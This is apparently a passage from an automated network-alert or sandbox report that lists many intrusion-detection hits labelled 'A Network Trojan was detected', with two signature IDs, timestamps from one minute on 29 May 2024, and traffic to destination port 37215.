                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.585994
                SID:2835222
                Source Port:41346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.074689
                SID:2829579
                Source Port:58092
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.667303
                SID:2829579
                Source Port:49176
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.829221
                SID:2829579
                Source Port:49328
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.281387
                SID:2829579
                Source Port:49886
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.721801
                SID:2829579
                Source Port:52590
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.502644
                SID:2835222
                Source Port:41246
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.509924
                SID:2835222
                Source Port:52818
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.227082
                SID:2829579
                Source Port:60276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.897581
                SID:2829579
                Source Port:36844
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666198
                SID:2829579
                Source Port:33486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.286268
                SID:2829579
                Source Port:50306
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.823461
                SID:2835222
                Source Port:40726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.822489
                SID:2829579
                Source Port:49872
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.947186
                SID:2835222
                Source Port:56016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.281986
                SID:2835222
                Source Port:42922
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.860651
                SID:2829579
                Source Port:48440
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276525
                SID:2835222
                Source Port:37326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.669408
                SID:2829579
                Source Port:59860
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.557245
                SID:2835222
                Source Port:42460
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.135550
                SID:2829579
                Source Port:39416
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.715320
                SID:2835222
                Source Port:53964
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.958894
                SID:2835222
                Source Port:44026
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.332722
                SID:2829579
                Source Port:41488
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702747
                SID:2835222
                Source Port:51090
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171848
                SID:2829579
                Source Port:47174
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.778071
                SID:2829579
                Source Port:46000
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.222864
                SID:2835222
                Source Port:53736
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.915470
                SID:2829579
                Source Port:58164
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.944978
                SID:2835222
                Source Port:42400
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.620309
                SID:2835222
                Source Port:54276
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925996
                SID:2829579
                Source Port:46326
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.942736
                SID:2835222
                Source Port:54238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.711893
                SID:2835222
                Source Port:51822
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.171828
                SID:2829579
                Source Port:49420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154566
                SID:2835222
                Source Port:59106
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.284263
                SID:2829579
                Source Port:54516
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.609647
                SID:2829579
                Source Port:52300
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.918261
                SID:2829579
                Source Port:33054
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.573332
                SID:2835222
                Source Port:60882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.655038
                SID:2835222
                Source Port:59830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231319
                SID:2829579
                Source Port:51648
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.229195
                SID:2835222
                Source Port:59136
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.520107
                SID:2829579
                Source Port:54658
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.390223
                SID:2829579
                Source Port:34810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.847194
                SID:2829579
                Source Port:43762
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.868155
                SID:2829579
                Source Port:44940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111102
                SID:2829579
                Source Port:45506
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.209843
                SID:2835222
                Source Port:49410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.210680
                SID:2835222
                Source Port:51930
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.265771
                SID:2829579
                Source Port:52324
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:48.612552
                SID:2829579
                Source Port:34814
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.590660
                SID:2829579
                Source Port:49342
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.898451
                SID:2829579
                Source Port:56852
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.666282
                SID:2829579
                Source Port:57394
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.763158
                SID:2829579
                Source Port:44386
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.769934
                SID:2829579
                Source Port:52854
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.215324
                SID:2835222
                Source Port:45418
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.668714
                SID:2829579
                Source Port:46890
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.745313
                SID:2829579
                Source Port:47154
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.038133
                SID:2829579
                Source Port:58826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.155151
                SID:2829579
                Source Port:34130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857177
                SID:2835222
                Source Port:46498
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.859590
                SID:2835222
                Source Port:49464
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.263773
                SID:2835222
                Source Port:54372
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.220980
                SID:2829579
                Source Port:48034
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.140877
                SID:2829579
                Source Port:50638
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.438082
                SID:2835222
                Source Port:41268
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.864228
                SID:2829579
                Source Port:45810
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.913747
                SID:2829579
                Source Port:54996
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.993672
                SID:2835222
                Source Port:55622
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.508997
                SID:2835222
                Source Port:39966
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.783085
                SID:2835222
                Source Port:55846
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.872935
                SID:2829579
                Source Port:54202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.702410
                SID:2829579
                Source Port:55162
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.180360
                SID:2829579
                Source Port:51896
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.963949
                SID:2829579
                Source Port:42408
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:00.071603
                SID:2829579
                Source Port:34272
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.909308
                SID:2835222
                Source Port:34486
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507247
                SID:2835222
                Source Port:36878
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.231272
                SID:2835222
                Source Port:39598
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.959188
                SID:2829579
                Source Port:36910
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.226823
                SID:2835222
                Source Port:38676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.618692
                SID:2829579
                Source Port:60182
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.555623
                SID:2829579
                Source Port:42826
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.331496
                SID:2835222
                Source Port:33012
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.899493
                SID:2835222
                Source Port:55726
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.100823
                SID:2829579
                Source Port:36470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.815780
                SID:2829579
                Source Port:51706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.207944
                SID:2829579
                Source Port:44130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.789215
                SID:2829579
                Source Port:45322
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272634
                SID:2829579
                Source Port:51686
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.795062
                SID:2829579
                Source Port:50982
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.782692
                SID:2835222
                Source Port:39580
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.321836
                SID:2829579
                Source Port:42130
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.956325
                SID:2829579
                Source Port:59358
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.418586
                SID:2829579
                Source Port:37830
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.841854
                SID:2829579
                Source Port:53352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.649979
                SID:2829579
                Source Port:47396
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.901958
                SID:2835222
                Source Port:58192
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.931915
                SID:2835222
                Source Port:58302
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.663678
                SID:2829579
                Source Port:46556
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:11.652378
                SID:2835222
                Source Port:53378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:39.180748
                SID:2829579
                Source Port:50744
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464677
                SID:2829579
                Source Port:43122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:28.028053
                SID:2829579
                Source Port:44632
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:28.857168
                SID:2835222
                Source Port:48114
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:41.240145
                SID:2835222
                Source Port:38398
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948688
                SID:2835222
                Source Port:34920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.519180
                SID:2829579
                Source Port:52346
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.843857
                SID:2835222
                Source Port:37702
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.276005
                SID:2829579
                Source Port:37118
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.572123
                SID:2829579
                Source Port:50608
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.558307
                SID:2829579
                Source Port:59798
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.986437
                SID:2829579
                Source Port:51940
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.664297
                SID:2829579
                Source Port:37562
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.380472
                SID:2829579
                Source Port:43594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.773570
                SID:2835222
                Source Port:39036
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:37.111653
                SID:2835222
                Source Port:40538
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.279175
                SID:2829579
                Source Port:44108
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.971790
                SID:2835222
                Source Port:52292
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.365900
                SID:2829579
                Source Port:37806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.975031
                SID:2829579
                Source Port:60758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.394703
                SID:2835222
                Source Port:47806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154190
                SID:2835222
                Source Port:59532
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.640803
                SID:2829579
                Source Port:42332
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:53.842303
                SID:2835222
                Source Port:39534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.359571
                SID:2829579
                Source Port:59260
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.154303
                SID:2835222
                Source Port:39628
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:43.264548
                SID:2835222
                Source Port:33706
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.556950
                SID:2835222
                Source Port:38512
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.335409
                SID:2835222
                Source Port:34518
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:04.267694
                SID:2829579
                Source Port:55184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.731813
                SID:2835222
                Source Port:46758
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.276820
                SID:2835222
                Source Port:38378
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.794244
                SID:2835222
                Source Port:57314
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990343
                SID:2835222
                Source Port:42062
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990685
                SID:2835222
                Source Port:45664
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.436098
                SID:2829579
                Source Port:37352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.576094
                SID:2835222
                Source Port:36912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.722279
                SID:2829579
                Source Port:58594
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765631
                SID:2829579
                Source Port:55566
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990462
                SID:2835222
                Source Port:48794
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.534192
                SID:2829579
                Source Port:60432
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.567714
                SID:2829579
                Source Port:47172
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.945556
                SID:2829579
                Source Port:35160
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:50.731299
                SID:2829579
                Source Port:51950
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.990490
                SID:2835222
                Source Port:42420
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.042064
                SID:2829579
                Source Port:58336
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:03.225473
                SID:2829579
                Source Port:57120
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.470328
                SID:2829579
                Source Port:42676
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:02.137109
                SID:2835222
                Source Port:49470
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.766916
                SID:2835222
                Source Port:36170
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.574028
                SID:2835222
                Source Port:33552
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:06.320985
                SID:2829579
                Source Port:36422
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.468825
                SID:2835222
                Source Port:45238
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.272463
                SID:2835222
                Source Port:53616
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.562034
                SID:2835222
                Source Port:43558
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:08.366116
                SID:2829579
                Source Port:40410
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:30.925380
                SID:2829579
                Source Port:47202
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:20.588629
                SID:2829579
                Source Port:39452
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:32.968752
                SID:2835222
                Source Port:33936
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:51.790978
                SID:2835222
                Source Port:48156
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:14.226685
                SID:2829579
                Source Port:60288
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.948513
                SID:2835222
                Source Port:60806
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.507561
                SID:2829579
                Source Port:36352
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559543
                SID:2835222
                Source Port:51956
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:24.716198
                SID:2835222
                Source Port:41920
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:55.916169
                SID:2829579
                Source Port:37542
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.518844
                SID:2835222
                Source Port:53038
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.928983
                SID:2835222
                Source Port:51436
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:10.440899
                SID:2835222
                Source Port:57348
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.935169
                SID:2829579
                Source Port:36472
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.015408
                SID:2829579
                Source Port:43912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:57.947376
                SID:2829579
                Source Port:46942
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.765146
                SID:2835222
                Source Port:35792
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:22.885697
                SID:2829579
                Source Port:55392
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:22.660317
                SID:2829579
                Source Port:50134
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:14.660165
                SID:2835222
                Source Port:38618
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:24.933293
                SID:2835222
                Source Port:58206
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.464565
                SID:2835222
                Source Port:55466
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512929
                SID:2829579
                Source Port:50944
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:47.559215
                SID:2835222
                Source Port:41184
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:18.519929
                SID:2835222
                Source Port:34824
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:16.734509
                SID:2835222
                Source Port:48578
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:25.988977
                SID:2835222
                Source Port:54210
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:11.466073
                SID:2829579
                Source Port:50912
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.839682
                SID:2829579
                Source Port:41016
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:45.521441
                SID:2829579
                Source Port:33882
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.817251
                SID:2835222
                Source Port:46072
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.809716
                SID:2829579
                Source Port:56788
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:20.840184
                SID:2829579
                Source Port:41122
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:18.788197
                SID:2835222
                Source Port:41264
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.512088
                SID:2829579
                Source Port:60248
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:35.028000
                SID:2829579
                Source Port:41534
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:16:13.510902
                SID:2829579
                Source Port:52112
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
                Timestamp:05/29/24-15:15:27.794965
                SID:2829579
                Source Port:54212
                Destination Port:37215
                Protocol:TCP
                Classtype:A Network Trojan was detected
